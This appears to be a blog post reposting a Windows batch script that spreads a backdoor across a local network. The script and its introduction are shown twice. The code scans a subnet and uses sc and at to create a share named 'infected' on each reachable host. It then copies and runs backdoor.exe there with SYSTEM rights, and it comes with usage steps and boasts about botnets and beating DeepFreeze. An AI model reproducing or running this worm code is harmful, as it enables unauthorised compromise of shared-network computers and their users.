Virus Spreading using Batch Script
This script is notmine.... i got some where and thought of sharing here... nice script u guys canlearn from here how the worms are spreading..
------------------------------------------
A Simple yet Smart Script to spread your malwareacross a Local Area Network. You can edit the script to do an endlessinfection-Loop from every PC to EVERY PC, to just completely IGNORE protectionsystems like DeepFreeze. You don't have to bypass it when the whole LAN isinfected
with the right tweeks,when a computer comes online, will be infected from the rest of them.
Code:
rem This is a simple script to spread your malwareto Local Area Networks
rem such Internet-Caffes etc. It will start theschedule service on
rem every connected Computer remotely, with thehelp of SC utility.
rem Using the AT command will force every Computerto create a new
rem NetBios Share called "infected" at agiven time. It will copy your backdoor to
rem the infected Share, and execute it via the ATcommand once again.
rem Because of the nature of AT, your backdoorwill be executed under
rem SYSTEM\NT rights.
rem HOW TO USE IT:
rem 1 Move the Script on C:\ andrename it to spreader.bat
rem 2 Move the backdoor on C:\ andrename it to "backdoor.exe"
rem 3 Change the prewritten IP's toyour's (ipconfig)
rem 4 Double click it... and happybot-neting!
@Echo off
cls
rem Starting the schedule service Localy first.
sc start schedule
net start schedule
cls
rem Checking the username. Under SYSTEM, theusername variable is blank.
if not "%USERNAME%"=="" (
rem Sometimes we can't use SC, but SYSTEM can.
rem Insert the current time plus one minute here.
:systemrights
set SYSTIME=
set /P SYSTIME=[SYSTEM]-Give the Priv-Escalationtime (hH:mm format): %=%
if "%SYSTIME%"=="" gotosystemrights
at %SYSTIME% /interactive cmd.exe /c "startC:\spreader.bat"
echo.
echo If you're lucky, the attack will take placeat %SYSTIME% under the SYSTEM account.
echo I'm closing this window for now...
echo.
pause
exit
) ELSE (
goto pwnmebabe
)
:pwnmebabe
rem Here you set WHEN the new share will becreated.
echo Current time is: %TIME%
:pwntime
set PWNTIME=
set /P PWNTIME=[SHARE]-Give the Share-Creatingtime (hH:mm format): %=%
if "%PWNTIME%"=="" goto pwntime
echo.
rem Just to be sure, the second given time, musthave 5 minutes diff.
echo Current time is: %TIME%
:pwntimee
set PWNTIMEE=
set /P PWNTIMEE=[OWNAGE]-Give theBackdoor-Execution time (hH:mm format): %=%
if "%PWNTIMEE%"=="" gotopwntimee
echo.
echo I'm ready to spread the shit!
echo.
pause
cls
rem Try to speed-up the infection by attackingonly awake Computers
for /L %%j in (1,1,254) do (
ping -n 1 -w 50 109.68.149.%%j>nul
IF ERRORLEVEL 1 (
ECHOExcluding 109.68.149.%%j from the list...
) ELSE (
sc\\109.68.149.%%j start schedule
at\\109.68.149.%%j %PWNTIME% cmd.exe /c "net share infected=C:\windows\"
at\\109.68.149.%%j %PWNTIMEE% cmd.exe /c "start C:\windows\backdoor.exe"
cls
)
)
cls
rem Remember the space of 5 minutes? You'll needit here, to copy the malware. Increase it if you want.
echo Wait until %PWNTIME% and
pause
cls
for /L %%j in (1,1,254) do (
ping -n 1 -w 50 109.68.149.%%j>nul
IF ERRORLEVEL 1 (
ECHO109.68.149.%%j is offline...
) ELSE (
copy /YC:\backdoor.exe \\109.68.149.%%j\infected
cls
)
)
cls
echo Simple Spreading Batch Script
echo Author: AnalyseR
echo ----------------------------------------
echo
pause
@Echo on
---------------------------------
thank u.. i hope u guys love this inf.
------------------------------------------
A Simple yet Smart Script to spread your malwareacross a Local Area Network. You can edit the script to do an endlessinfection-Loop from every PC to EVERY PC, to just completely IGNORE protectionsystems like DeepFreeze. You don't have to bypass it when the whole LAN isinfected
with the right tweeks,when a computer comes online, will be infected from the rest of them.Code:
rem This is a simple script to spread your malwareto Local Area Networks
rem such Internet-Caffes etc. It will start theschedule service on
rem every connected Computer remotely, with thehelp of SC utility.
rem Using the AT command will force every Computerto create a new
rem NetBios Share called "infected" at agiven time. It will copy your backdoor to
rem the infected Share, and execute it via the ATcommand once again.
rem Because of the nature of AT, your backdoorwill be executed under
rem SYSTEM\NT rights.
rem HOW TO USE IT:
rem 1 Move the Script on C:\ andrename it to spreader.bat
rem 2 Move the backdoor on C:\ andrename it to "backdoor.exe"
rem 3 Change the prewritten IP's toyour's (ipconfig)
rem 4 Double click it... and happybot-neting!
@Echo off
cls
rem Starting the schedule service Localy first.
sc start schedule
net start schedule
cls
rem Checking the username. Under SYSTEM, theusername variable is blank.
if not "%USERNAME%"=="" (
rem Sometimes we can't use SC, but SYSTEM can.
rem Insert the current time plus one minute here.
:systemrights
set SYSTIME=
set /P SYSTIME=[SYSTEM]-Give the Priv-Escalationtime (hH:mm format): %=%
if "%SYSTIME%"=="" gotosystemrights
at %SYSTIME% /interactive cmd.exe /c "startC:\spreader.bat"
echo.
echo If you're lucky, the attack will take placeat %SYSTIME% under the SYSTEM account.
echo I'm closing this window for now...
echo.
pause
exit
) ELSE (
goto pwnmebabe
)
:pwnmebabe
rem Here you set WHEN the new share will becreated.
echo Current time is: %TIME%
:pwntime
set PWNTIME=
set /P PWNTIME=[SHARE]-Give the Share-Creatingtime (hH:mm format): %=%
if "%PWNTIME%"=="" goto pwntime
echo.
rem Just to be sure, the second given time, musthave 5 minutes diff.
echo Current time is: %TIME%
:pwntimee
set PWNTIMEE=
set /P PWNTIMEE=[OWNAGE]-Give theBackdoor-Execution time (hH:mm format): %=%
if "%PWNTIMEE%"=="" gotopwntimee
echo.
echo I'm ready to spread the shit!
echo.
pause
cls
rem Try to speed-up the infection by attackingonly awake Computers
for /L %%j in (1,1,254) do (
ping -n 1 -w 50 109.68.149.%%j>nul
IF ERRORLEVEL 1 (
ECHOExcluding 109.68.149.%%j from the list...
) ELSE (
sc\\109.68.149.%%j start schedule
at\\109.68.149.%%j %PWNTIME% cmd.exe /c "net share infected=C:\windows\"
at\\109.68.149.%%j %PWNTIMEE% cmd.exe /c "start C:\windows\backdoor.exe"
cls
)
)
cls
rem Remember the space of 5 minutes? You'll needit here, to copy the malware. Increase it if you want.
echo Wait until %PWNTIME% and
pause
cls
for /L %%j in (1,1,254) do (
ping -n 1 -w 50 109.68.149.%%j>nul
IF ERRORLEVEL 1 (
ECHO109.68.149.%%j is offline...
) ELSE (
copy /YC:\backdoor.exe \\109.68.149.%%j\infected
cls
)
)
cls
echo Simple Spreading Batch Script
echo Author: AnalyseR
echo ----------------------------------------
echo
pause
@Echo on
---------------------------------
thank u.. i hope u guys love this inf.
0 comments:
Post a Comment